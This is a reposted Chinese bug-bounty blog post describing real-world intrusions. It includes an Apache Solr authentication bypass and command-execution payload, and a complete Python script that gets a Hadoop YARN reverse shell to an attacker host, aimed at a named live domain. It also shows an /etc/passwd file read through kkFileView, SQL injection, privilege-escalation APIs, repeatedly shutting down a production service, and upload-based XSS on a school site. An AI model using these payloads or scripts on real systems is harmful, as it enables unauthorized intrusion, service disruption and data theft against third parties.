文章总结: 本文为SRC漏洞挖掘实战经验分享,作者通过未授权访问、命令执行、文件读取等手法,成功发现并利用了ApacheSolr身份认证绕过与命令执行、HadoopYARN未授权访问getshell、kkFileView任意文件读取、越权接口、SQL注入、文件上传XSS及Harbor未授权访问等多个高危漏洞。文章提供了具体漏洞利用方法与POC,强调仅供学习,使用者需自行承担后果。 综合评分: 75 文章分类: 漏洞分析,渗透测试,红队,内网渗透,WEB安全
[SRC]记一次侥幸的捡漏
原创
略懂安全的三秋 略懂安全的三秋
略懂安全的三秋
2026年6月6日 16:52 广西
在小说阅读器读本章
去阅读
无问AI远超通用大模型,在网络安全问题理解、代码生成、安全研究分析及其他复杂场景上是你的最佳选择。
链接:https://www.wwlib.cn/index.php/
如果积分不够用可以使用我的积分码,即可领取100积分
兑换链接:https://www.wwlib.cn/index.php/gift
WUWEN_FxWhkLkyuiU01gOL0y
开局未授权起手
这是一个Solr系统,存在命令执行,这里复现一下
Apache Solr身份认证绕过漏洞
/solr/admin/info/properties:/admin/info/key
Apache Solr命令执行
{ "add-listener": { "event": "postCommit", "name": "rce1", "class": "solr.RunExecutableListener", "exe": "sh", "dir": "/bin", "args": ["-c", "id > /opt/solr/server/solr/demo/conf/pwned.txt 2>&1"] } }
[{"id":"trigger_1717000000"}]
hadoop未授权访问导致getshell
这里直接使用脚本反弹shell
import requeststarget = 'http://cqcc.5hui.cn:8088/' # 目标 Hadoop YARN ResourceManager 地址lhost = 'XXX.XXX.XXX.XXX' # 攻击机 IP(需替换为真实地址)# 1. 请求一个新的 Application IDurl = target + 'ws/v1/cluster/apps/new-application'resp = requests.post(url)app_id = resp.json()['application-id']# 2. 构造恶意应用,执行反弹 Shell 命令url = target + 'ws/v1/cluster/apps'data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': f'/bin/bash -i >& /dev/tcp/{lhost}/8888 0>&1' }, }, 'application-type': 'YARN',}requests.post(url, json=data)
kkFileView任意文件读取
/getCorsFile?urlPath=file:///etc/passwd
下一个
因为有注册,所以我们注册一手
之后利用雪瞳发现越权接口(现在关登录了,复现有限)
可以获取管理员密码,但加密了
下一个
未授权访问一枚,这里的搜寻存在SQL注入
可以看到’报错,后续发现是报错注入,所以过程多,这里上结果
下一个
这里密码爆破没有成功,所以就只能去跑接口了
这个接口时查看服务的运行
这个接口则是关闭服务,这是一个中间件服务,但他重启的很快,所以要连续发包
可以看到服务关闭了
下一个
这是一个学校的管理网站
这种登录框八成时ruoyi的
弱口令不行就只能跑接口,接口还不行的话,就跑路。
翻js文件找到了未授权的文件上传接口
构造请求包水一枚XSS
下一个
Harbor未授权访问,搜寻框输入/,
后续拉镜像查敏感信息就行了
加纳!
由于传播、利用本公众号所提供的信息而造成``的任何直接或者间接的后果及损失,均由使用``者本人负责,公众号略懂安全的三秋不``为此承担任何责任,一旦造成后果请自行承担!
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:略懂安全的三秋 略懂安全的三秋 略懂安全的三秋《[SRC]记一次侥幸的捡漏》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。


![[SRC]记一次侥幸的捡漏](/images/random/titlepic/2.jpg)









评论